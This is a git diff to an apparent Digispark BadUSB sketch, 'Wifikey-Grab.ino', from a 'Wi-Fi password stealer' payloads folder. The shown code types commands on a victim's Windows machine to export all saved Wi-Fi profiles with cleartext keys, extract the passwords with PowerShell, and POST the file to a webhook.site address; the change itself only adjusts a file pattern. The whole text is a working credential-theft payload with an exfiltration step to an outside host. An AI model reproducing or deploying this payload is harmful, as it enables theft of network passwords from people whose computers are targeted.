diff --git a/payloads/Wi-Fi password stealer/Wifikey-Grab.ino b/payloads/Wi-Fi password stealer/Wifikey-Grab.ino index 567f724..a21d211 100644 --- a/payloads/Wi-Fi password stealer/Wifikey-Grab.ino +++ b/payloads/Wi-Fi password stealer/Wifikey-Grab.ino @@ -21,7 +21,7 @@ void loop() { DigiKeyboard.delay(300); DigiKeyboard.println("netsh wlan export profile key=clear"); //grabbing all the saved wifi passwd and saving them in temporary dir DigiKeyboard.delay(500); - DigiKeyboard.println("powershell Select-String -Path Wi-Fi-* -Pattern 'keyMaterial' > Wi-Fi-PASS"); //Extracting all password and saving them in Wi-Fi-Pass file in temporary dir + DigiKeyboard.println("powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS"); //Extracting all password and saving them in Wi-Fi-Pass file in temporary dir DigiKeyboard.delay(500); DigiKeyboard.println("powershell Invoke-WebRequest -Uri https://webhook.site/ -Method POST -InFile Wi-Fi-PASS"); //Submitting all passwords on hook DigiKeyboard.delay(1000);